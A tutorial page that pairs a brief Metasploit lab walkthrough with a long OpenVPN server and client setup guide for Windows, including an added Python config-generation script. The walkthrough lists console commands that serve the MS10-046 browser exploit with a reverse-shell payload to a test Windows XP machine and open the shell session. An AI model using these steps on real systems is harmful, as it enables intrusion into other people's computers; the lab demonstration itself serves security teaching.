Exploiting Client Side using Metasploit

Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromising an ecommerce website and then using that website as a proxy to launch attacks on unsuspecting website visitors.

How many of us have received viruses from a malicious webpage or website? More often than not, the owner of the website does not know that it contains malicious code attacking its visitors. In these scenarios the target of the exploit is the user’s web browser.

The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images: they process ecommerce transactions, interact with databases, launch media players, and transfer files. Yet neither the web nor the web browser was designed with security in mind, which makes the web browser an opportune target for attacks.

Client-side Defense

So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:

  • Update and run an antivirus program and an antispyware program.
  • Update your operating system and web browsers on a regular basis.
  • Update media players (eg. Flash, Quicktime), readers (eg. Acrobat), and add-ons regularly.
  • Update Java.
  • Do not visit nefarious websites (eg. sites that deal with pirated music and warez).
  • Do not surf the web as an administrator: make sure User Account Control (UAC) is enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result.

Client-side Attack

In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.

Demo steps:

Launch msfconsole, load the exploit and payload, set the options, and launch the exploiting web server and web page. See the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost  <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer) browse to your Metasploit server’s IP address using Internet Explorer to launch the client side attack.
12. Once the exploit has finished launching list your sessions:
msf > sessions -l
13. msf > sessions -i 1
14. You should now have a Windows shell to interact with.

Easy Windows Guide for Open VPN server client installation

Downloading and Installing OpenVPN

  1. Download the installer from here and run it on the server computer.
  2. Install OpenVPN on each client. (This step can be skipped for now and done at any convenient time.)

Certificates and Keys

Preparatory Steps

  1. Navigate to the C:\Program Files\OpenVPN\easy-rsa folder in the command prompt:
    1. Press Windows Key + R
    2. Type “cmd.exe” and press Enter.
    3. Navigate to the correct folder:
       cd "C:\Program Files\OpenVPN\easy-rsa"
  2. Initialize the OpenVPN configuration:
       init-config
    • NOTE: Only run init-config once, during installation.
  3. Open the vars.bat file in a text editor:
       notepad vars.bat
  4. Edit the following lines in vars.bat, replacing “US”, “CA,” etc. with your company’s information:
       set KEY_COUNTRY=US
       set KEY_PROVINCE=CA
       set KEY_CITY=SanFrancisco
       set KEY_ORG=OpenVPN
       set KEY_EMAIL=mail@host.domain
  5. Save the file and exit notepad.
  6. Run the following commands:
       vars
       clean-all

Building Certificates and Keys

  1. The certificate authority (CA) certificate and key:
       build-ca
    • When prompted, enter your country, etc. These will have default values, which appear in brackets. For your “Common Name,” a good choice is to pick a name to identify your company’s Certificate Authority. For example, “OpenVPN-CA”:
       Country Name (2 letter code) [US]:
       State or Province Name (full name) [CA]:
       Locality Name (eg, city) [SanFrancisco]:
       Organization Name (eg, company) [OpenVPN]:
       Organizational Unit Name (eg, section) []:
       Common Name (eg, your name or your server’s hostname) []:OpenVPN-CA
       Email Address [mail@host.domain]:
  2. The server certificate and key:
       build-key-server server
    • When prompted, enter the “Common Name” as “server”
    • When prompted to sign the certificate, enter “y”
    • When prompted to commit, enter “y”
  3. Client certificates and keys. For each client, choose a name to identify that computer, such as “mike-laptop” in this example:
       build-key mike-laptop
    • When prompted, enter the “Common Name” as the name you have chosen (e.g. “mike-laptop”)
    • Repeat this step for each client computer that will connect to the VPN.
  4. Generate Diffie Hellman parameters (this is necessary to set up the encryption):
       build-dh

Configuration Files

  1. Find the sample configuration files:
       Start Menu -> All Programs -> OpenVPN -> OpenVPN Sample Configuration Files

Server Config File

  1. Open server.ovpn
  2. Find the following lines:
       ca ca.crt
       cert server.crt
       key server.key
       dh dh1024.pem
  3. Edit them as follows:
       ca "C:\\Program Files\\OpenVPN\\config\\ca.crt"
       cert "C:\\Program Files\\OpenVPN\\config\\server.crt"
       key "C:\\Program Files\\OpenVPN\\config\\server.key"
       dh "C:\\Program Files\\OpenVPN\\config\\dh1024.pem"
  4. Save the file as C:\Program Files\OpenVPN\easy-rsa\server.ovpn

Client Config Files

This is similar to the server configuration.

  1. Open client.ovpn
  2. Find the following lines:
       ca ca.crt
       cert client.crt
       key client.key
  3. Edit them as follows:
       ca "C:\\Program Files\\OpenVPN\\config\\ca.crt"
       cert "C:\\Program Files\\OpenVPN\\config\\mike-laptop.crt"
       key "C:\\Program Files\\OpenVPN\\config\\mike-laptop.key"
    • Notice that the name of the client certificate and key files depends upon the Common Name of each client.
  4. Edit the following line, replacing “my-server-1” with your server’s public Internet IP Address or Domain Name. If you need help, see Static Internet IP below.
       remote my-server-1 1194
  5. Save the file as C:\Program Files\OpenVPN\easy-rsa\mike-laptop.ovpn (in this example). Each client will need a different, but similar, config file depending upon that client’s Common Name.

Copying the Server and Client Files to Their Appropriate Directories

  1. Copy these files from C:\Program Files\OpenVPN\easy-rsa\ to C:\Program Files\OpenVPN\config\ on the server:
       ca.crt
       dh1024.pem
       server.crt
       server.key
       server.ovpn
  2. Copy these files from C:\Program Files\OpenVPN\easy-rsa\ on the server to C:\Program Files\OpenVPN\config\ on each client (mike-laptop, in this example):
       ca.crt
       mike-laptop.crt
       mike-laptop.key
       mike-laptop.ovpn
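The server and client config edits above, and the copy lists in this section, follow one pattern: point the ca/cert/key/dh directives at absolute paths under config\ with every backslash doubled, name each client's cert and key after its Common Name, and set remote to the server's public address. The Python script below is an added example, not part of the OpenVPN guide or of OpenVPN itself, that automates that pattern for any Common Name. It assumes the install path C:\Program Files\OpenVPN from the guide, works on constructed stand-ins for the sample files (only the lines the guide edits), and ends with a check that flags a client config whose cert or key file name does not match the Common Name in its own file name, the mistake the note in the client section warns about.

```python
"""Generate server and per-client OpenVPN configs from the sample files.

Added example; not part of the OpenVPN guide. Assumptions: the install path
C:\\Program Files\\OpenVPN (as in the guide) and the constructed template
strings below, which hold only the directives the guide tells you to edit.
"""
from pathlib import PureWindowsPath

CONFIG_DIR = r"C:\Program Files\OpenVPN\config"

# Constructed stand-ins for the shipped sample files (a real server.ovpn or
# client.ovpn has many more lines; these are the ones the guide edits).
SAMPLE_SERVER_OVPN = """\
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
"""

SAMPLE_CLIENT_OVPN = """\
client
dev tun
proto udp
remote my-server-1 1194
ca ca.crt
cert client.crt
key client.key
"""


def win_quoted_path(directory, filename):
    """Absolute path in the form OpenVPN expects inside a quoted Windows
    config value: double-quoted, with every backslash doubled."""
    full = str(PureWindowsPath(directory, filename))
    return '"' + full.replace("\\", "\\\\") + '"'


def rewrite_config(text, file_map, remote=None):
    """Rewrite the file directives named in file_map (directive -> file name
    under CONFIG_DIR) to absolute quoted paths. If remote is given as
    (host, port), the 'remote' directive is rewritten too. Blank lines,
    comments and unrelated directives pass through unchanged."""
    out = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";")):
            out.append(line)
            continue
        directive = stripped.split(None, 1)[0]
        if directive in file_map:
            out.append(f"{directive} {win_quoted_path(CONFIG_DIR, file_map[directive])}")
        elif directive == "remote" and remote is not None:
            out.append(f"remote {remote[0]} {remote[1]}")
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def server_config(template=SAMPLE_SERVER_OVPN):
    """server.ovpn with its four file directives pointed at config\\."""
    return rewrite_config(template, {"ca": "ca.crt", "cert": "server.crt",
                                     "key": "server.key", "dh": "dh1024.pem"})


def client_config(common_name, server_host, port=1194, template=SAMPLE_CLIENT_OVPN):
    """<common_name>.ovpn: cert/key names follow the client's Common Name and
    'remote' points at the server's public address (DynDNS name or static IP)."""
    files = {"ca": "ca.crt", "cert": f"{common_name}.crt", "key": f"{common_name}.key"}
    return rewrite_config(template, files, remote=(server_host, port))


def files_for_server():
    """Files to copy from easy-rsa\\ to config\\ on the server."""
    return ["ca.crt", "dh1024.pem", "server.crt", "server.key", "server.ovpn"]


def files_for_client(common_name):
    """Files to copy from easy-rsa\\ on the server to config\\ on that client."""
    return ["ca.crt", f"{common_name}.crt", f"{common_name}.key", f"{common_name}.ovpn"]


def check_client_config(config_filename, text):
    """Consistency check: the cert and key file names inside a client config
    must match the Common Name, which is also the config file's stem.
    Returns a list of problems (empty when the config is consistent)."""
    stem = PureWindowsPath(config_filename).stem
    problems = []
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and parts[0] in ("cert", "key"):
            value = parts[1].strip('"')
            name = PureWindowsPath(value.replace("\\\\", "\\")).stem
            if name != stem:
                problems.append(f"{parts[0]} file {name!r} does not match Common Name {stem!r}")
    return problems


if __name__ == "__main__":
    print(server_config())
    cfg = client_config("mike-laptop", "myserver.dyndns.org")
    print(cfg)
    print("problems:", check_client_config("mike-laptop.ovpn", cfg))
```

Run it as-is to see the rewritten server and mike-laptop configs; to produce a config for another client, call client_config with that client's Common Name and write the result to <common_name>.ovpn, then copy the files listed by files_for_client to that machine.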

Starting OpenVPN

  1. On both client and server, run OpenVPN from:
       Start Menu -> All Programs -> OpenVPN -> OpenVPN GUI
  2. Double click the icon which shows up in the system tray to initiate the connection. The resulting dialog should close upon a successful start.

Further Considerations / Troubleshooting

Firewall Configuration

If you have connection problems, make sure to set a rule on your server’s firewall allowing incoming traffic on UDP port 1194.

Port Forwarding

If your server is behind a router, you will need to forward the port chosen for OpenVPN (in this example UDP 1194) to the server. Consult your router’s documentation for details on this.

To set up port forwarding, you will likely need to set up the server with a static local IP address instead of the default dynamic (changing) IP. Instructions for Windows XP may be found here. Make sure to choose a static IP address that is not in the range your router might assign as a dynamic IP, but is within the router’s subnet (usually 192.168.0.xxx, 10.0.0.xxx, or similar).

Static Internet IP

Your server will need to have a static internet IP or Domain Name to be accessible over the long term. One solution is to sign up for an account with DynDNS and install the DynDNS Updater on your server. When signing up you will determine the static Domain Name of your server. (For example, “myserver.dyndns.org”) You will use this Domain Name in the client configuration files as part of the “remote” directive.

Running OpenVPN as a Service

Running OpenVPN as a service will allow:

  1. OpenVPN to be run from a non-administrator account.
  2. OpenVPN to be started automatically on system startup. This is often preferred on the server machine, as well as any machines which will be constantly connected to the server.

To set this up:

  1. Run the Windows Service administrative tool:
    1. Press Windows Key + R
    2. Type “services.msc” and press Enter.
  2. Find the OpenVPN service, and set its Startup Type to “automatic.”
  3. Optionally, start the service now.

Security Tips

  1. Transmit all needed files to the client computers using a secure means such as a USB drive (email is not always a secure means).
  2. Choose a port other than UDP 1194, and replace the port number wherever this guide mentions UDP port 1194.

Cloning OpenVPN Servers

If you include OpenVPN in a cloned server build, you will find that all servers have the same MAC address for the TAP device, which causes packet loss across the network. Standard methods of changing the IP address from scripts do not work on the TAP device; to resolve this, delete and recreate the TAP device using the scripts included with OpenVPN:

C:\Program Files\OpenVPN\bin\deltapall

C:\Program Files\OpenVPN\bin\addtap

You will then have to rename the connection to match the entry in the config file.

OpenVPN GUI (for Windows)

The official OpenVPN release for Windows ships with a GUI frontend called simply “OpenVPN-GUI” and can be found in the .\bin\ subdirectory of the installation path, with shortcuts placed on the desktop and start menu unless unselected during program installation. This wiki page describes how to use this GUI frontend. The source code for the GUI is available on the OpenVPN-GUI project page. Instructions for building the GUI are available here.

The GUI lives in the system tray, so controlling one or more VPN processes is always done through the context menu of the GUI icon. When the GUI is launched, nothing will happen beyond placing the icon in the tray. To do something useful with the GUI, you need to interact with it by right-clicking to bring up the context menu.

Please note the GUI will start the VPN process in the context of the running user. When this user does not have administrative rights (or has rights limited through UAC) it will most likely fail to correctly start the VPN as routes and addressing cannot be changed by unprivileged users.

When starting the OpenVPN GUI, the standard Windows practice of right-clicking on the shortcut and selecting “Run As Administrator” will allow a UAC user to run it in administrative context. If the user lacks admin rights, it will be necessary to “Run As…” and enter credentials for an administrative user. Once started in this fashion, further interaction via the tray icon will be run in the context of the elevated user.

Creating and placing config files

By default, the GUI will present context entries to connect to any *.ovpn file under the .\config\ dir of the installation path (including subfolders.) If you do not place any config files here, the context menu in the GUI will not allow you to connect anywhere (since it has nowhere to connect to.)

After initially launching the OpenVPN-GUI program, the GUI icon will be shown in the tray, as shown in the image below. Note that this icon can be hidden when marked “inactive” by the OS, so check the expanding arrows to the left of the system tray if it’s started but not shown.

Context Menu

Right-clicking on the icon will pull up the context menu. This menu will allow you to connect any of the config files placed as explained above. Note that you must name these files with the .ovpn file extension. Windows has a bad habit of hiding “known” file extensions, so be careful not to name a config file something like Sample.ovpn.txt by mistake.

Once you have created a config file, going into the context menu and selecting the “Connect” entry will start openvpn on that config file. A status window will open up showing the log output while the connection attempt is in progress (see first screenshot below.) After successful connection, the status window will be hidden, but can be viewed from the context menu if desired.

Once connected, the context menu will allow that VPN to be disconnected; select that option to terminate the active connection.

When VPN instances are running from the GUI, the tray icon will change color to indicate this:

Advanced Features

It is normally not necessary to use some of these advanced features, but they are described briefly below.

Setting a proxy

If a system proxy is required for outbound access to the Internet and the OpenVPN transport must use this proxy in order to send outbound data, the proxy settings under the Settings menu item can adjust this. By default, OpenVPN uses a proxy only if it was specified in the config file, but the GUI allows proxy settings to be used based on the system proxy, or a manually-defined proxy.

Change private key passphrase

If a private key is specified in the configuration, the Change Password selection in the context menu will allow a new passphrase to be specified.

Changing config dir location

The path to consider for locating .ovpn config files will default to the installed OpenVPN .\config\ dir. If desired, this can be changed via the registry key at HKLM\SOFTWARE\OpenVPN-GUI under the value config_dir.

Advanced registry changes

Other registry settings are available at the key noted above, and can be used by an administrator to hide portions of the context menu. This can include removing the Change Password and proxy settings. Note that a user is still able to manually decrypt or change passphrase on RSA keys outside the GUI, such as with the openssl utility. This feature applies only to the display menu options and is not a form of password management or file security.